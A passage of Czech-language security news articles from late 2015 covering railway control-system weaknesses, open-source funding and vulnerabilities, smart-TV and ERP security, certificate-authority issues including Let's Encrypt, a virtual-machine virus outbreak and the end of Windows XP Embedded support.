Podle expertů ze skupiny SCADA StrangeLove by hackeři, pokud by pronikli do tohoto systému, mohli způsobit záměrnou nehodu, zastavit vlaky nebo dokonce měnit jejich trasy a způsobit tak nedozírné ekonomické škody, ale i ztráty na lidských životech.
Pro tyto typy útoků je sice nutný fyzický přístup k síti, na které pracují železniční systémy, ale k ní se mohou hackeři dostat jednoduše tak, že přimějí zaměstnance železnice, aby na svých počítačích otevřeli odkazy na infikované stránky nebo připojili do sítě USB se škodlivým obsahem.
GSM karty představují bezpečnostní riziko Další významnou bezpečnostní dírou na železnici jsou karty GSM-R SIM, které se v mnoha zemích používají pro zjištění polohy vlaku, ale také k obsluze některých funkcí vlaku nebo dokonce umožňují v případě potřeby zastavit lokomotivu. Tým SCADA StrangeLove zjistil, že pokud by došlo k přerušení GSM signálu, vlaky využívající tento komunikační systém by se automaticky zastavily, protože by ztratily spojení mezi SIM kartou a centrálním navigačním systémem.
U těchto SIM karet je navíc automaticky nastaven jednoduchý PIN v podobě číselného kódu 1234, který mají vlakoví průvodčí při prvním použití změnit, ale většinou nikdo nekontroluje, zda se tak skutečně stalo. Navíc je možné přes modem, který karty využívají, aktualizovat firmware, čehož by mohl využít zkušenější útočník, podotýkají analytici. Rovněž zjistili, že některé modemy používané ve vlacích nejsou dostatečně zabezpečeny před útoky vedenými přes mobilní modemy.
Provozovatelé železničních infrastruktur i dopravci, zvláště pak pokud jde o státní či polostátní firmy, by tak měli lépe dbát na bezpečnost cestujících a proškolit své zaměstnance, aby se vyvarovali chování, které by mohlo vystavit železnici bezprecedentním útokům, uzavírá skupina SCADA StrageLove.
Jak (ne)bezpečený je open source?
9.1.2016 Hrozby Poté, co se nedávno našly zásadní zranitelnosti o open source softwarových knihovnách, které využívá i řada komerčních programů, vyvstavá otázka: Jak je na tom vlastně open source s bezpečností?
Pokud existuje ukázkový příklad problémů, kterým čelí zabezpečení open source, může jím být Werner Koch, německý vývojář, který napsal a posledních 18 let udržoval Gnu Privacy Guard (GnuPG), pilíř softwarového ekosystému open source.
Od prvního vydání v roce 1999 se stal GnuPG jedním z nejpoužívanějších open source bezpečnostních nástrojů na světě a chránil e-mailovou komunikaci – počínaje vládními úředníky a konče Edwardem Snowdenem.
Přesto měl Koch v posledních letech potíže vyjít s penězi. Odhadovaných 25 tisíc dolarů průměrně vybraných každý rok od roku 2001 nestačilo na podporu jeho úsilí.
Jak uvedla společnost Pro Publica, tento 53letý vývojář málem rezignoval na další údržbu GnuPG. Když pak Snowden šokoval svět odhalením aktivit NSA, přesvědčilo to Kocha, aby to nevzdával. „Jsem příliš idealistický,“ prohlásil Koch.
Příběh má ale šťastný konec. Když Pro Publica vydala příběh o jeho nedostatku financí, objevili se dárci z celého světa, kteří Kochovi přispěchali na pomoc. Snadno překonal cíl 137 tisíc dolarů, který si vytyčil jako potřebný k podpoře své práce. To mu umožnilo najmout vývojáře na částečný úvazek.
Koch dostal jednorázovou odměnu 60 tisíc dolarů od iniciativy CII (Core Infrastructure Initiative) při Linux Foundation. Facebook a společnost Stripe, která zajišťuje on-line zpracování plateb, se zavázaly, že každá bude dotovat Kochův projekt 50 tisíci dolary.
Podfinancované projekty, jako je třeba výše zmíněný GnuPG, byly donedávna významnou součástí rozsáhlého ekosystému open source. Široce rozšířené opětovné použití kódu pohání současný rostoucí vývoj technologií, ale velký objem tohoto kódu odrazuje od bezpečnostního prověřování.
Tento problém se zásadněji začal řešit teprve nedávno a často teprve na základě narušení bezpečnosti, které uvedlo celé odvětví do rozpaků a přimělo jej k akci.
Programování za stravu
Okolnosti, které ponechaly Kocha léta v beznadějné situaci, nejsou neobvyklé. Poté, co Neel Mehta jako výzkumník Googlu odhalil zranitelnost Heartbleed, která je vážnou chybou zabezpečení v součásti OpenSSL, se šokovaná softwarová komunita dozvěděla, že za projekt byl z velké části odpovědný malý tým, který Jim Zemlin, výkonný ředitel sdružení Linux Foundation, popisuje jako „dva chlapíci se jménem Steve“.
Stephen Henson a Steve Marquess pracovali na částečný úvazek na udržování aktuálnosti kódu a kompenzací jim bylo pár tisíc dolarů ročně z dobrovolných příspěvků.
Dodavatelé technologií spoléhající se na open source rychle začali záležitost řešit, aby se stav projektu OpenSSL napravil. Iniciativa CII, která tvůrci GnuPG dala grant 60 tisíc dolarů, byla založená jen několik měsíců předtím, aby pomohla financovat práci Hensona a dalších na OpenSSL.
Finanční podporu poskytují i giganti z Křemíkového údolí, jako jsou Amazon, Adobe, Cisco, Facebook nebo Google.
Tisíce očí
Zranitelnost Heartbleed nebyla první vážnou zranitelností open source. Například chyba Apache Struts ji předcházela přibližně o rok a byla přinejmenším stejně závažná.
Možná díky mediálnímu šílenství zranitelnost Heartbleed natrvalo zdiskreditovala slavné rčení Erica Raymonda o kvalitě open source: „Je-li dost očí, jsou všechny chyby malé.“ Většina bezpečnostních profesionálů tvrdí, že tato poznámka měla vždy spíše smysl záměru než popisu skutečnosti.
„Nikdy se mi nelíbilo tvrzení o mnoha očích,“ říká Joshua Corman, technologický ředitel společnosti Sonatype. „Pouhé tvrzení o existenci mnoha očí neznamená, že mají tyto oči motivaci a schopnost najít chyby zabezpečení.“
Open source ujištění o „mnoha očích“ sloužilo převážně k zakrývání slabiny tohoto ekosystému a vyvolávalo představu neustálé ostražitosti v situaci, kdy žádná neexistovala, uvádí Bill Weinberg, ředitel open source strategie u firmy Black Duck Software.
„U chyby Shellshock zcela jistě mnoho očí nebylo,“ popisuje Weinberg, který tak odkazuje na kritickou zranitelnost odhalenou v kódu Bash v roce 2014. „Tento kód se považoval za dobře prověřený, ale ukázalo se, že jeho dohled neprobíhal úplně správně, jelikož jeho prověření předpokládali úplně všichni.“
I když by se chtělo předpokládat, že integrita kódu open source je vysoká, údaje společnosti Sonatype naznačují opak. Její analýza příslušných komponent udělaná v rámci jí spravovaného kódu zjistila, že známé zranitelnosti komponent open source byly opravované jen v necelé polovině případů, napsal Corman do časopisu ;login vydávaného asociací Usenix. U opravených problémů přitom byla průměrná doba potřebná k jejich nápravě neuvěřitelných 390 dnů.
Také zmínky o „open source“ odděleně od komerčního, proprietárního softwaru mohou být zavádějící. Ačkoli kdysi existovala dělicí čára mezi open source softwarovými projekty a proprietárními protějšky, většina moderních aplikací představuje kombinaci softwarových komponent třetích stran a mnoho z nich může být právě typu open source, připomíná Corman.
Odpovědnost za bezpečnost na úrovni kódu
Jaká je správná odpověď? Ať už je to lepší nebo horší, odpověď je převážně kulturní, prohlašuje Katie Moussourisová, manažerka společnosti HackerOne a někdejší nejvyšší bezpečnostní strategička Microsoftu...
Už brzy na vašich chytrých televizích: Nová vlna kyberzločinu
30.12.2015 Hrozby Prodeje chytrých televizorů rostou. Je tak jen otázkou času, kdy se stanou předmětem zájmu kyberzločinců.
Chytré televize představují novou živnou půdu pro kyberzločince. Zvlášť, když jejich ochrana dalece zaostává za počítači nebo chytrými telefony. Dopady pro uživatele přitom mohou být závažné. A ohroženi nejsou jen běžní uživatelé a domácnosti, ale například i společnosti, pro které chytré televize představují užitečný nástroj obchodních konferencí. A jelikož se očekává, že v následujících čtyřech letech prodeje chytrých televizí každoročně porostou o více než dvacet procent, je jejich zabezpečení tématem, kterým je třeba se zabývat.
„Spousta těchto systémů vůbec nevyužívá poznatky, se kterými se dnes ve světě informačních technologií běžně pracuje,“ podotýká Phil Marshall z Tolaga Research, společnosti zaměřené na internet věcí a jeho bezpečnost.
Chytré televize jsou v zásadě počítači s USB porty, operačními systémy a síťovým připojením, tedy zařízení ne až tak odlišná od chytrých telefonů. Na rozdíl od počítačů a mobilních zařízení však chytré televize často nepožadují jakékoliv autentizace. Což v praxi v podstatě znamená, že každý, kdo má k televizi přístup, ji může ovládat jako její majitel. Některé modely navíc neřeší ani to, zda člověk, který má k televizi přístup na dálku přes internet, k ní má přístup také fyzicky.
Podle Craiga Younga z bezpečností společnosti Tripwire tak může docházet i ke kuriózním, ovšem choulostivým situacím: „Představte si, že máte firemní prezentaci a někdo vám na televizi místo tabulek a grafů na dálku zobrazí něco, co by vaši kolegové rozhodně vidět neměli.“
Řada předních výrobců – Samsung, LG a Sony – mají pro chytré televize vlastní specializované obchody, uživatelé však i přesto mohou stáhnout škodlivý software prostřednictvím obchodů třetích stran, k čemuž dnes na úrovni chytrých telefonů dochází poměrně běžně. Při neodpovídajícím nastavení routeru jsou televize zranitelné například prostřednictvím man-in-the-middle útoků, ale třeba i skrze softwarové aktualizace. Některé modely totiž při jejich stahování nepracují s protokolem SSL/TLS, jiné zase nemají mechanismy k ověření důvěryhodnosti stahovaného firmwaru.
Dnes jsou útoky na chytré televize sice ojedinělé, s jejich rozšiřováním a větší využívaností však lze počítat s tím, že jich bude přibývat. Také úměrně tomu, jak do nich bude víc a víc uživatelů zadávat například platební údaje. A je otázkou, zda by byl řešením antivirový software. Jako ochrana by sice fungovat mohl, zároveň by ale mohl snižovat výkon televize, eventuálně omezit funkčnost některých služeb a aplikací.
„Lidé z branže mají nad čím přemýšlet,“ uzavírá Young.
Chraňte své ERP před zlými hackery
27.12.2015 Hrozby Hackery doslova jako magnet přitahují systémy, které obsahují z jejich pohledu nejhodnotnější informace, tedy ERP či CRM. Mnohé firmy ale těmto svým klíčovým produktům nevěnují dostatečně velkou pozornost, což ataky výrazně ulehčuje. Přinášíme vám návod, jak práci útočníků v tomto směru co nejvíce ztížit.
Nedávno se rozšířily zprávy o tom, že byl obviněn čínský výrobce z manipulace s firmwarem ručních skenerů. Tento software obsahoval škodlivý kód zaměřený na zdroje v dodavatelských řetězcích a sbíral data z platforem ERP (Enterprise Resource Planning). Shromažďoval vše, co mohl – od finančních údajů přes logistické až po informace o zákaznících.
Takové útoky odhalují slepou skvrnu, kterou má většina organizací v oblasti zabezpečení. Tento atak objevila bezpečnostní firma TrapX a nazvala ho Zombie Zero. Mnoho organizací napadených tímto typem přitom používalo všechny nejnovější a nejlepší bezpečnostní obranné nástroje, jež ale byly nasazené a navržené k odhalování vnějších hrozeb – tedy nikoli útoku ze skeneru produktů používaného v expedičním oddělení.
„Zombie Zero začal z hardwaru zakoupeného a nasazeného uvnitř napadené infrastruktury a nenapadal operační systémy. Namísto toho se zaměřil přímo na systémy ERP,“ uvedl Mariano Nunez, výkonný ředitel společnosti Onapsis.
„Nešťastnou skutečností je, že hackeři jsou krok před většinou podniků, protože jen málo organizací má zralé bezpečnostní metody pro sledování ataků vůči systémům ERP jako třeba SAP, nemluvě o plánovitém zahrnutí těchto systémů do programů správy zranitelností,“ dodává Nunez.
Názorný příklad – Microsoft vydal v loňském roce varování týkající se trojského koně z rodiny malwaru Carberp, který se zaměřoval na systémy SAP. Ve svém oznámení uvedl, že je to podle nich poprvé, co byl malware vytvořený tak, aby se zaměřil právě na tuto platformu.
To podle Nuneze znamená, že útočníci identifikovali bohatý cíl uvnitř organizací: platformy ERP, které v sobě zahrnují všechna kritická data a procesy příslušné společnosti.
„V tomto případě se malware k cíli propašoval pomocí skenovacího zařízení. Příště by však mohl být trojský kůň v tiskárně, směrovači, přístupovém bodu nebo v nějakém dalším zařízení, které většina lidí považuje za neškodné,“ tvrdí Nunez.
Pokud je ochrana systémů ERP a platforem SCM (správa dodavatelského řetězce) tak důležitá, proč organizace nedokážou tyto systémy kontrolovat a zabezpečit na stejné úrovni, jako tak činí u koncových bodů a dalších systémů v síti?
„Pravdou ale je, že to není jednoduché,“ vysvětluje Nunez a dodává: „Existuje zde celá řada problémů.“
Dokonce i v hodně vyspělých organizacích systémy ERP vyrostly organicky prostřednictvím jednotlivých obchodních jednotek, které integrovaly do jádra své vlastní i externí systémy prostřednictvím akvizic.
Pochopení skutečného rozsahu a vzájemného propojení těchto systémů je tedy významný úkol.
Také protokoly používané těmito systémy jsou často proprietární, což znamená, že tradiční systémy IDS a další technologie nedokážou komunikaci mezi těmito systémy porozumět a rozlišit nezávadný provoz od škodlivého.
Možná opatření
Podle názoru Nuneze je klíčovým bezpečnostním opatřením pro tyto systémy koncept oddělení funkcí (SoD, Segregation of Duties).
Většina plánů zabezpečení pro platformy ERP a SCM se zaměřuje na omezování přístupových práv operátorů na funkce, které jsou pro plnění jejich úkolů nezbytné. Cílem je zajistit, aby se žádný jednotlivý uživatel nemohl dopustil podvodu nebo zneužít systém. Ačkoli má SoD svou důležitost, řeší jen jednu část rovnice zabezpečení.
Ignoruje totiž možnost, že by neověřená osoba (útočník) mohla zneužít zranitelnosti a chyby konfigurace a zadávat příkazy a instrukce mimo proces řízený prostřednictvím SoD. „S ohledem na tyto typy potíží je pochopitelné, že se organizace snaží zajistit kompletní zabezpečení svých systémů ERP,“ uvádí Nunez.
Na otázku, co by tedy doporučil, Nunez nabízí pět věcí, které by organizace měly u systémů ERP a SCM vzít v úvahu:
Pokládejte si otázky o systémech, které zpracovávají a ukládají základní podniková data
Co jsou zač? Kde jsou? Jak jsou přístupné a kým? Zajistěte identifikaci a kategorizaci každého systému zapojeného do kritické činnosti.
Vybudujte program pro správu zranitelností systémů ERP
Tento program by měl používat klíčové metriky a hlášení o úrovni zabezpečení a změnách v oblasti zabezpečení s alespoň měsíční periodou.
Mapování zranitelností a možností útoků
Zranitelnosti kritických systémů ERP a možnosti útoků na ně by se měly pravidelně mapovat. Frekvence takového procesu by měla přímo odpovídat důležitosti ukládaných dat pro podnik.
Zajistěte situační informovanost o úrovni rizika v reálném čase pro všechny základní podnikové systémy
Pomocí skenerů zranitelností, monitoringu provozu a analýzy chování uživatelů v reálném čase by měla oddělení zabezpečení informací dokázat hlásit aktuální stav ochrany a hrozeb pro hlavní podnikové systémy.
Aby bylo možné finančním ředitelům přesně hlásit riziko pro organizaci, měly by se formulovat bezpečnostní situace a aktuální stav rizika s ohledem na hlavní podnikové systémy.
Vytvořte základnu pro zabezpečení a poměřujte systémy vůči ní:
Jakákoli odchylka směrem k nižší ochraně dat by se měla prošetřit a příčina identifikovat. Navíc by měl bezpečnostní tým dokázat určit, jak se snížila ochrana systému a kdy a jak dlouho byl v nezabezpečeném stavu předtím, než se to objevilo.
„Lidé tradičně používají obranné technologie s mnoha parametry na základě předpokladu, že útok přijde z vnější strany sítě. Díky úspěchům phishingových útoků, atakům typu drive-by a nových hrozeb, v rámci které může být libovolný hardware s běžícím softwarem místem kompromitování dat, se podniky přestanou starat o místo, odkud útok pochází, a namísto toho se zaměří na to, co je v jejich prostředí kritické a mohlo by být terčem zájmů hackerů,“ popisuje Nunez.
Základem takového přístupu je snížit pravděpodobnost úspěšnosti útoku. Když je však atak úspěšný, měl by ho bezpečnostní tým rychle identifikovat a výrazně omezit jeho dopady. Proto je nutné mít důležité podnikové systémy dobře prozkoumané a aktivně monitorované.
Kořenový certifikát Symantecu je podle Googlu nedůvěryhodný
15.12.2015 Hrozby Správci webových stránek a vývojáři, kteří pracují se některými certifikáty od Symantecu, by si měli obstarat nové.
Android OS, prohlížeč Chrome a další produkty Googlu přestanou důvěřovat certifikátům navázaným na dvacet let starý VeriSign root certificate.
Zpráva se objevila poté, co společnost Symantec odhalila plány na postupné utlumení certifikačních autorit Class 3 Public Primary Certification Authority, které získala před pěti lety.
V oznámení, které společnost ke konci podpory zveřejnila, uvádí, že kořenový certifikát důvěryhodný pro většinu prohlížečů i operačních systémů, nepoužívá už od 1. prosince a doporučuje všem majitelům digitálních certifikátů na něj navázaných, aby si obstarali nové, navázané na modernější kořenový certifikát. Všechny jsou k dispozici zdarma.
Podle Googlu Symantec nepřestane Class 3 Public Primary CA používat zcela, ovšem plánuje ho využívat pro jiné, dosud nepřiblížené účely. Výrobce oblíbeného prohlížeče však nemůže zaručit, že neveřejné certifikáty vydané pod daným rootem, nebudou zneužity k „narušení nebo ovlivnění bezpečné komunikace produktů Googlu nebo jejich uživatelů“.
„Jelikož Symantec se zdráhá blíže specifikovat nové způsoby využití těchto certifikátů a jelikož si je firma vědoma rizika, které takové jednání představuje pro uživatele produktů Google, požádala nás, abychom tento kořenový certifikát odebrali a přidali na seznam nedůvěryhodných,“ vysvětluje Ryan Sleevi, jeden z vývojářů Googlu.
Na seznam nedůvěryhodných tak společnost přidává dvě verze Class 3 Public Primary CA, jednu podepsanou postupně čím dál tím méně užívanou hašovací funkcí SHA-1, druhou podepsanou ještě starší MD2. Obě byly vydány v roce 1996 a jejich platnost by měla vypršet v roce 2028.
Podle Googlu se však Symantec nedomnívá, že by některý z jeho klientů spravujících HTTPS stránky, nebo jejich uživatelé, měli být tímto krokem ovlivněni. Ve svém vlastním upozornění přitom Symantec připouští, že uživatelé, pokoušející se navštívit webové stránky navázané na nedůvěryhodný kořenový certifikát, se v budoucnu mohou setkat s chybovými hlášeními.
To se může týkat rovněž podepsaných aplikací, jestliže i výrobci operačních systémů začnou odebírat Class 3 Public Primary CA ze seznamu důvěřovaných. Certifikáty by proto měli aktualizovat i dotčení vývojáři.
Už v listopadu Symantec informoval všechny velké výrobce internetových prohlížečů také o tom, ať stáhnou ze seznamu důvěryhodných certifikátů VeriSign Class 3 Public Primary CA G1 (PCA3-G1), jelikož je založen na starším, méně bezpečném systému ochrany.
Tento kořenový certifikát však už několik let nebyl ke generování nových certifikátů využíván, proto by jeho stažení nemělo pro svět veřejného internetu představovat žádné riziko. Podle mluvčího Symantecu Noaha Edwardsena jej chce společnost používat pouze interně, jako podpůrný, pro firemní klientelu.
Skutečný chaos u virtuálních strojů
13.12.2015 Hrozby Začalo to jako jednoduché zavolání na linku podpory zaměstnancem jednoho z našich hlavních vývojových center: Vypadávaly tam telefonní hovory. Brzy se vyskytly podobné stížnosti od dalších uživatelů a také od obchodníků, kteří zmiňovali, že neschopnost udržet telefonní hovory jim výrazně ztěžovala uzavírání obchodů.
Cokoliv, co ovlivňuje obrat, určitě získá něčí okamžitou pozornost. Telekomunikační tým zkontroloval nastavení naší aplikace Cisco Call Manager i VoIP brány – a vše bylo v pořádku.
Trochu překvapivý zdroj
Linka technické podpory však následně dostala i řadu stížností na příliš pomalé připojení k internetu, a to ze stejného vývojového centra. Někteří lidé se rozhodli přivolat na pomoc i bezpečnostní oddělení.
Šéf našeho oddělení pro správu sítí, který je také odpovědný za administraci firewallů, mi zaslal zprávu, která hned získala mou pozornost: „Přijď se na to raději podívat.“ Ukázal mi protokoly firewallu chránícího vývojové centrum, které byly plné odchozích spojení přes port 445 do několika míst v internetu.
Museli jsme tuto aktivitu rychle zarazit, aby se přístup k internetu a funkce telefonní služby obnovily. Náš pokus zablokovat odchozí provoz na firewallu nebyl úspěšný, protože protokoly vytížily prostředky firewallu natolik, že jsme na něm nemohli udělat vlastně vůbec nic.
Síťový inženýr tedy umístil seznam řízení přístupu na jeden ze směrovačů, což mu nakonec umožnilo upravit pravidlo zasaženého firewallu a zablokovat škodlivý provoz. Toto opatření zase zpřístupnilo internet a telefonní služby, takže se tím vyřešily bezprostřední problémy. Co je ale způsobilo? Náš inženýr měl naštěstí zálohu protokolů, takže jsme mohli data v klidu analyzovat.
Kontrola ukázala, že IP adresy generující provoz byly přidělené učebně. Lektor mi prozradil, že účastníci jednoho z kurzů instalovali bitovou kopii serveru na desktopy v učebně a na rozdíl od běžného protokolu učebny připojili virtuální stroje přímo do podnikové sítě.
Zjistili jsme, že tyto virtuální stroje neobsahovaly žádný antivirový software a nebyly záplatované více než dva roky, takže jsme spustili antivirový program a jeden z těchto virtuálních strojů zkontrolovali. A najednou bylo vše jasné.
Virtuální stroj byl infikovaný virem, jehož vlastnosti odpovídaly aktivitám, jež způsobily odepření služby. Tedy ve skutečnosti bylo nakažených všech 30 desktopů ve třídě. A to nebylo ještě to nejhorší.
Nainstalované bitové kopie vycházely ze základní bitové kopie udržované u poskytovatele cloudu, která sama obsahovala virus, což vysvětluje, jak se nakazilo všech 30 strojů.
Bez oprav
Zkontaktoval jsem osobu, která nesla odpovědnost za provisioning bitových kopií virtuálních strojů, abych zjistil, proč se nepodnikly kroky, které by takové infekci mohly zabránit. Vysvětlila, že před pár lety některé opravy způsobovaly nestabilitu bitových kopií, takže se instalace patchů zastavily.
Pokud jde o antivirový software, zmíněný člověk prohlásil, že neměl rozpočet, aby ho nainstaloval na více než 1 500 bitových kopií systému Microsoft Windows. Možná že mě mělo takové vysvětlení uklidnit, ale nedokázal jsem skrýt své zděšení.
Patnáct set bitových kopií virtuálních strojů mělo minimální nebo žádnou ochranu před virovou infekcí! A tyto bitové kopie se pravidelně používaly v několika našich odděleních v počítačích, které jsou připojené do podnikové sítě.
Okamžitě jsem požádal o schůzku našeho šéfa IT i viceprezidenty oddělení, která nasazují virtuální stroje. Žádal jsem okamžitý mandát pro skenování všech bitových kopií, instalaci našeho podnikového antivirového softwaru, instalaci všech oprav a zavedení procesu, který by zajistil shodu bitových kopií s procesem správy oprav v naší společnosti.
To vše jsem musel stihnout během jediného pracovního dne.
Budou mít všechny phishingové weby platný certifikát?
10.12.2015
S příchodem projektu Let's Encrypt se začaly ozývat hlasy, které se ptají, zda „certifikát zdarma pro všechny“ znamená i pro všechny phishingové a malware weby. Znamená to, že certifikát už není zárukou kvality a autorita ho vydá komukoliv, kdo si řekne? Bez ohledu na jeho úmysly a obsah jeho webu?
Na začátku se sluší připomenout, že Let's Encrypt je iniciativou Internet Security Research Group (ISRG), kterou podporuje mimo jiné Mozilla, Cisco, Facebook, EFF, Akamai a další. Cílem je odstranit všechny překážky k pohodlnému šifrování na webu a dát uživatelům automatické nástroje ke získání a nasazení HTTPS s důvěryhodným certifikátem. Nejen podle Let's Encrypt by totiž mělo být HTTPS pokud možno všude.
Autorita prošla beta testováním a před několika dny spustila vydávání certifikátů bez nutnosti mít pozvánku. Přestože je celý projekt stále označen jako beta, vydává důvěryhodné certifikáty a vy je můžete mít na svém webu.
Útoky šifrované a „bezpečné“
Velmi rychle se objevily výtky směrem k autoritě, konkrétně k vydávání certifikátu „pro všechny“. Autorita totiž nijak nezkoumá obsah webu a teoreticky tedy vydá certifikát třeba i phishingovému webu, kterému k vydání stačí jen možnost vystavovat soubory na správné cestě na serveru. Což samozřejmě není technicky problém zajistit a je pak úplně jedno, na jaké (sub)doméně takový web běží. Získá certifikát, kterým se pak může prokazovat uživatelům.
Falešný Facebook poznáte podle chybějícího zámečku… nebo ne? Uživatelé se nejčastěji bojí toho, že web označený zeleným zámečkem bude vypadat důvěryhodněji a oni bez obav o svou bezpečnost vloží osobní údaje. Oni přeci psali, že to je bezpečné! Obavy jsou to jistě oprávněné, uživatelé mají tendenci věřit webu, na kterém je napsáno, že je bezpečný. Pokud je to ještě umocněno velkým obrázkem zámku, pak to musí být přeci v pořádku. Dnes je učíme, že se nemají dívat na obrázky na stránce, ale na ikonku zámku vedle adresy. Ta ale vlastně není správným indikátorem, protože neříká nic o obsahu webu.
Zvlášť u Domain Validated (DV) certifikátů není vlastně web nijak s validací svázán. Autoritě stačí, že žadatel o certifikát dokáže svou vazbu k doméně a/nebo webu na ní. Obvykle vystavením nějaké unikátní informace. Ano, z pohledu bezpečnosti je to špatný přístup, protože certifikační autorita vlastně žádnou opravdovou certifikaci neprovádí. Udělá jen velmi zběžnou kontrolu a vystaví o ní zprávu. Ale jednou jsme Pandořinu skříňku otevřeli a od DV certifikátů už není cesty zpět. Z hlediska uživatelů jsou ale stejně důvěryhodné (čti: zámeček je stejně zelený) jako standardní OV certifikáty.
Přestože takové certifikáty tu byly dávno před Let's Encrypt a různé autority dovolovaly automatickou komunikaci se žadatelem (a ani těch pár dolarů nepředstavuje pro útočníka problém), až nová iniciativa donutila dav zvednout obočí a zeptat se na to, zda „pro všechny“ opravdu znamená i pro provozovatele phishingových webů. Zřejmě proto, že Let's Encrypt je až „moc automatická“ a „moc zadarmo“, takže z hlediska svého principu už neklade vůbec žádné překážky.
Představitelé Let's Encrypt se k celému problému poměrně obšírně vyjádřili. Rozhodování pro nás bylo velmi těžké. Na jednu stranu tyhle stránky také nemáme rádi a naším cílem je budovat bezpečnější web. Na druhé straně si nejsme jisti, že by vydavatel certifikátů (přinejmenším Domain Validation) byl na úrovni, kde by měl dohlížet na phishingové a malwarové stránky. Ke cti provozovatelů autority je třeba říct, že tím na celý problém nerezignovali s pouhým konstatováním, že si to má řešit někdo jiný (PNJ).
Autority jsou špatnými hlídači
Na technické úrovni je situace jasná: DV certifikáty jen prokazují, že konkrétní veřejný klíč patří ke konkrétní doméně. V certifikátu není uvedeno, jak je doména (nebo dokonce obsah na ní) důvěryhodný, jak nakládá s informacemi a zda web neporušuje nějaká další pravidla. Rovněž chybí údaje o reálné identitě provozovatele webu – ani tohle není úkolem DV certifikátu. Přesto ale mnoho lidí věří tomu, že přítomnost důvěryhodného certifikátu naznačuje alespoň některé z těchto věcí.
Let's Encrypt ale vysvětluje, že certifikační autorita není v dobré pozici pro zásady proti phishingu a malware – nemá dostatečně kvalitní informace o obsahu webu. Mnohem lepší je spolupracovat s velkými organizacemi, které mají o obsahu mnohem lepší povědomí. Jako například Microsoft a Google, říká Josh Aas, výkonný ředitel ISRG. Jmenované společnosti cíleně procházejí web, sbírají z něj data a pomocí rozsáhlého strojového učení (řízeného desítkami lidí) mohou odhalovat nebezpečné webové stránky. O informace se pak dělí pomocí API, takže je možné od nich zjistit reputaci jednotlivých webů.
Josh Aas ale varuje, že ani taková spolupráce nemusí zaručovat úplnou jistotu. Změna obsahu webu může být rychlejší než vydání certifikátu nebo jeho revokace. Navíc problémová může být jen jediná stránka z celého webu, vysvětluje rozsah celého problému. Navíc, když autorita odmítne takovému webu vystavit certifikát, nijak ho tím neomezí. Jen prostě uživatelé neuvidí zelený zámeček. Uživatelé jsou mnohem lépe chráněni moderním prohlížečem, který obsahuje anti-phishing a anti-malware techniky a netrpí výše zmíněnými omezeními.
I kdyby se ale jedna z autorit rozhodla přísně obsah posuzovat a vlastními silami rozhodovat o důvěryhodnosti, nevyřeší to hlavní problém. Neexistuje totiž závazná metodika, kterou by se řídily stovky dalších autorit. Jinými slovy: nakonec by podezřelému webu certifikát vystavil někdo méně zodpovědný a uživatel by viděl stejně zelený zámeček. Zlí hoši si vždycky budou schopni certifikát obstarat a používat jej dostatečně dlouho, aby zneužili uživatele. Nezáleží na tom, jak dobře je na tom nejlepší autorita, ale jak dobře je na tom ta nejhorší. Záleží tu na nejslabším článku, který ale není těžké najít.
HTTPS bude životně důležité
Podle ředitele ISRG by se HTTPS mělo stát standardem a mělo by být jen další součástí technologické skládačky jako HTTP nebo TCP. Už nejsme v devadesátých letech, kdy bylo šifrování něčím nadstandardním jen pro banky a další „důležité“ weby. Od té doby se TLS rozšířilo do všech koutů webu, najdeme ho na sociálních sítích, e-mailových službách, elektronických obchodech, státní správě a podobně. Časem se stane naprostým standardem. Jakmile k tomu dojde, bude získání důvěryhodného certifikátu životně důležitou otázkou namísto ‚něčeho navíc‘. V takové chvíli může být chybné posouzení obsahu velmi nákladné, varuje Josh Aas.
Z technického hlediska povede taková chyba k výpadku, což je riziko, které s HSTS hrozí už dnes. Pokud už jednou Wikipedie prohlásila, že její servery se vždy musí prokazovat platným certifikátem, už nemůže své prohlášení změnit. Pokud by jí odmítly autority z nějakého důvodu další certifikát vystavit, stala by se pro své uživatele nedostupnou.
Z morálního hlediska by se ale autority dostaly do pozice, kdy by rozhodovaly o svobodě slova. Byly by velmi snadno zneužitelné k odstraňování nepohodlných webů – prostě by jim nevystavily životně důležitý certifikát. Chyby (neúmyslné či jiné) by v takovém případě znamenaly cenzuru, protože autority by se staly hlídači veřejného projevu a přítomnosti v online světě. A to pro certifikační autoritu není dobrá role, vysvětluje ředitel ISRG.
Hodnotit budou jiní
Alespoň na začátku bude tedy Let's Encrypt posuzovat důvěryhodnost webů pomocí Google Safe Browsing API a odmítne vystavit certifikát doménám, které jsou označené jako phishingové nebo obsahují malware. Google API je nejlepším zdrojem informací, které máme a pokusíme se dělat víc než jen získávat informace z tohoto API.
Boj proti závadným webům je podle ISRG velmi důležitý, ale certifikační autorita by neměla stát v čele tohoto boje. Let's Encrypt tedy implementujeme toto ověřování, protože se mnoha lidem nelíbí, že by na něj autorita měla úplně rezignovat, byť vydává pouze DV certifikáty. Rádi bychom ještě pokračovali v debatě, než opustíme to, co je podle mnoha lidí důležitým úkolem certifikační autority. I když s tím nesouhlasíme, uzavírá Josh Aas.
Microsoft pohřbí poslední podporovanou verzi Windows XP
10.12.2015 Hrozby Společnost Microsoft oficiálně ukončila podporu pro operační systém Windows XP už loni v dubnu. Podporována zůstala pouze tzv. Embedded verze. Ale i to má skončit, definitivní tečku za touto stařičkou platformou udělá americký softwarový gigant už za pár týdnů – příští rok v lednu. „Od ledna 2016 končí podpora operačního systému MS Windows XP Embedded. Tento operační systém byl, a stále ještě je, využíván zejména v bankomatech a řídících počítačích technologických procesů,“ uvedl Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.
Podle něj byla podpora Embedded verze prodloužena především proto, že se tak masivně používala v těchto důležitých odvětvích, jako je například bankovnictví.
Toho ale využívali i běžní uživatelé. „Existovaly též neoficiální postupy ukazující, jak využít softwarových záplat určených pro XP Embedded i u standardních Windows XP, což umožňovalo přežití tohoto operačního systému na mnoha domácích PC slabší konfigurace,“ konstatoval Bašta.
Žádné aktualizace Ukončení podpory ze strany Microsoftu neznamená, že by tento populární operační systém přestal ze dne na den fungovat. S trochou nadsázky se dá říci, že Windows XP jsou nesmrtelná. Pokud o to uživatelé budou stát, mohou na počítačích fungovat klidně další desítky let.
Microsoft samotnou funkčnost nijak omezovat nebude, vše bude fungovat jako doposud. Vycházet však nebudou už nikdy žádné aktualizace a záplaty. To znamená, že pokud se v systému objeví nějaká bezpečnostní trhlina, kybernetičtí zločinci ji budou moci snadno zneužít k proniknutí do cizího PC.
